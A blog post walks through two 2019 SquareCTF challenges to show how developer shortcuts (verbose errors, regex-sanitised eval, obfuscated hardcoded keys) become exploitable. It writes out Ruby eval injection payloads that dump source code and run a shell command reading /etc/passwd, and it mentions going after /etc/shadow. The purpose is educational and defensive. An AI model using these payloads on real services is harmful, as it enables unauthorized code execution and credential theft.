Abusing Common Bad Development Decisions in the 2019 SquareCTF

Doug Rickert
Nov 8 · 7 min read

I try to regularly do security Capture the Flags (CTFs) as they come up and I’m available. They’re usually a great way to play with the latest vulnerabilities, learn new technologies, and work on your program or system debugging in general. At times I’ll be working a software development focused job outside of security, and people will comment that it’s interesting I do these even though I may not be in a security organization at the time. I like to joke that learning how to hack and break WebApps and systems is the fun way to learn Linux and Software Development Patterns in general.

And while a lot of the challenges seem totally outlandish, there’s usually a few situations I can remember making a decision as a Software Developer that could land me in the situation the CTF is modeled around. I remember thinking in these situations “this isn’t the most secure, this security guidance is pretty generic…. does it really apply to my situation?” And then I make the decision to meet a deadline or minimize the work I am doing in an area of code I don’t want to be in, and I use a “development bandaid” 😅

I use the term “development bandaid” as something you put in the code, knew probably shouldn’t be there, but it makes your life easier in the short term and you “swear you’ll come back and fix it later” 😏

So, I wanted to share two situations that recently came up in the awesome CTF that Square put on this year: https://squarectf.com/2019/index.html


Challenge 1: Talk to Me

The first challenge for SquareCTF was a fairly simple challenge. There was a service running on a port, and when you connected to it and give some input like “Hi”, you get this:

$> nc localhost 5678
Hello!
Hi
Sorry, I can’t understand you.

$>

So, we can guess that the program is looking for a specific input. We don’t have any information about it though, so you put on your security researcher hat and start playing with it. A popular tool is to “fuzz” inputs (i.e. try a bunch of different character combinations for inputs) and see how the application reacts. So, we try different inputs including a “11”:

$> nc localhost 5678
Hello!
11
undefined method `match’ for 11:Integer
/talk_to_me.rb:16:in `receive_data’
/var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run_machine’
/var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run’
/talk_to_me.rb:31:in `<main>’
$>

Bingo! We’ve gotten some error message. How many of us have left error messages in the output because it makes it easier to debug when customers file tickets? ✋ Well this is our first bandaid to expose. Why does this bandaid matter? Well let’s keep going a little further.

As our fuzzer keeps trying different inputs, eventually it tries a “,”:

$> nc localhost 5678
Hello!
,
(eval):1: syntax error, unexpected ‘,’
/talk_to_me.rb:16:in `eval’
/talk_to_me.rb:16:in `receive_data’
/var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run_machine’
/var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run’
/talk_to_me.rb:31:in `<main>’
$>

Wait a minute… did that say eval? The eval function is one of those programming functions that’s in just about every programming language (C, Python, Ruby to name a few), and every programming language says to NEVER use it as there’s likely a huge security concern… and yet there it is in so many languages 🙄. Essentially, it let’s you pass code in at runtime at have it be.. well evaluated. That means you can do just about anything on the server that that user has power over.

But, how many of us have ever had to interact with someone else’s code and, for one reason or another, didn’t have the ability or time to refactor it? ✋ <- there’s me, with my hand raised, just about every day I write software. In this case though, eval is REALLY bad, and seems to be running something to do with our input, so what did the developer probably do in this situation? They used a regex to sanitize user input so we “couldn’t” pass malicious code to the eval. See how couldn’t is in quotes? Yeah.

So, since this is not an uber detailed penetration testing write-up, we fast forward through the exploit development: we deduce it’s Ruby code from the error message, we look up common Ruby/regex mistakes, find that Ruby handles new lines weird, play around a bit and we get this:

$> cat test.txt
{}
self.test
$> cat test.txt | nc localhost 5678
Hello!
private method `test’ called for #<TalkToMeServer::EM_CONNECTION_CLASS:0x00005626e4d1beb8>
/talk_to_me.rb:16:in `eval’
/talk_to_me.rb:16:in `eval’
/talk_to_me.rb:16:in `receive_data’
/var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run_machine’
/var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run’
/talk_to_me.rb:31:in `<main>’

Cool, we’re running arbitrary ruby code! We can now go look up the eventmachine gem, and we realize that there is a send_file_data() method. Since we know the location of the code we’re running (again, detailed error messages in output is bad), we can dump the code:

$> cat test.txt
{}
self.send_file_data(‘/talk_to_me.rb’)
$> cat test.txt | nc localhost 5678
Hello!
require ‘eventmachine’
require ‘socket’

module TalkToMeServer
def post_init
set_comm_inactivity_timeout(3)
send_data “Hello!\n”
end

def receive_data data
if data =~ /magicdebugstring/
send_data “hostname: “ + Socket.gethostname + “\n”
end
if data =~ /\A[\d<>(){}|+-=*\/%\s\’\”]+$/
begin
if eval(data)&.match(/\A.*(hello).*$/i)

We have source code, we have arbitrary command execution, and at this point we can find out that the flag is an environment variable, so we can just call ENV[‘FLAG’] and get it. But, let’s do one more thing unrelated to the CTF, because it’s fun:

$> cat test.txt
{}
self.send_data(`cat /etc/passwd ; echo “end”`)
$> cat test.txt | nc localhost 5678
Hello!
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

We have arbitrary command execution on the host (we ran the bash command “cat /etc/passwd”)! I could also dump /etc/shadow that has hashed passwords of any local accounts… or just change the password for the user entirely so I could log in another way 😃

So let’s review what bandaids needed to be there for this to work:

  • The developer put in verbose and detailed error logs to the output. This let us notice that eval was being called, that match was being called, showed us exactly what library was being used so we knew what methods were at our disposal, and finally the location of the source code. And to think, this bandaid was supposed to make our life easier
  • The developer did try to sanitize their user input (this is good!) to protect against a dangerous area in their code. However, the sanitation ultimately failed and we could run whatever code we wanted. Two bandaids here, very dangerous functionality that should’ve been refactored and a mitigation in place that was not properly reviewed for edge cases by security

Challenge 2: Aesni

This one I really liked because it deals with improper secrets management, and a developer thinking they’re very clever hiding that impropriety. Secrets management is a situation that every developer deals with on a day to day, and every developer has done something that they know is kind of sketchy but they do it anyway. Whether it’s plaintext credentials on the filesystem, or, hard-coding them your application 🙀

You may have one day thought “but I really do have to embed this secret into this binary” (no, you probably don’t). And you probably thought “I read about this cool binary obfuscation technique that Stuxnet used, I can use that” (no, please don’t!). But you do some sort of obfuscation anyway, and it gets past the “strings” command which is the common way to see if there’s any hardcoded strings in a binary that shouldn’t be there:

$ strings aesni
flap-d0d8411ec06-- alok & mbyczkowski{c
`R B\]
VVVT
~?Otzi]xaGmF
a77;7i719codZ{+A170gmj6eb221
JV\]k
d38;`*e
u _5?8gldech4>
`d0d8b3b?d4d
nLpP
TRSQ
`4071c71`1i0E
XB_G
N,uI-c6>9ee1d5jeX#
Vy4668bkjdbk16
z{B0d78ba26d5i1h
5`736n9j94n0
.shstrtab
.text

$

But, as an attacker, I’m just going to load your binary up into a reverse engineering debugger (in this case, edb or Evan’s Debugger that’s preloaded in Kali). And then, I can even shorten the time I spend watching your machine code run by specifically looking at where a compare (cmp in machine code) happens… in this case it was a cmpsb operand:

The ESI register holds the key that was super secretly embedded into the binary, because the program eventually has to do a compare to my input in the EDI register (my input was “test”). To be fair, this was fairly secretly embedded… “ThIs-iS-fInE” doesn’t exist in memory until you let the portion of the code run that built that secret string from the obfuscation mechanism right before it did the compare.

So, your code may pass something as simple as the command “strings” + an eyeball check, or even the “Static Analyzer” tool that security has you run your binary through to not let you make this awful security infraction. But, you did this developer bandaid so that you didn’t have to take the time to do proper secrets management and avoid security blocking your binary from reaching production, and here we are:

$ ./aesni ThIs-iS-fInE
flag-cdce7e89a7607239

Challenge 5: Inwasmble (https://squarectf.com/2019/inwasmble.html) took a similar approach with an embedded key that is dynamically created and compared byte by byte to a user’s input. It’s pretty long and looks largely the same as this one, so I’m not going to go into the details of how I solved it. But, again, you can follow a similar pattern and walk through it in the debugger to extract a key. If you are convinced you’re smart enough to embed a key into something a user has full control over, try that challenge out or just walk through a different 2019 SquareCTF write-up. I hope it makes you rethink your confidence 😃


Conclusion

CTF’s are a fun way to learn different technology and techniques, and will often have scenarios that hit home. In this CTF, what hit home for me was:

  • Deciding how to properly handle secrets for a program I’m writing
  • Balancing verbose error messages that make troubleshooting easier but not giving too much details
  • Relying on legacy code that I don’t have time to refactor

And when you think you’re clever and above the generic security guidance because you’ve got a super awesome mitigation that blocks something bad from happening, well, you should still make sure someone in your security org can review your level of clever. Because for an attacker it is likely a lot easier to get around your mitigation then you think.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade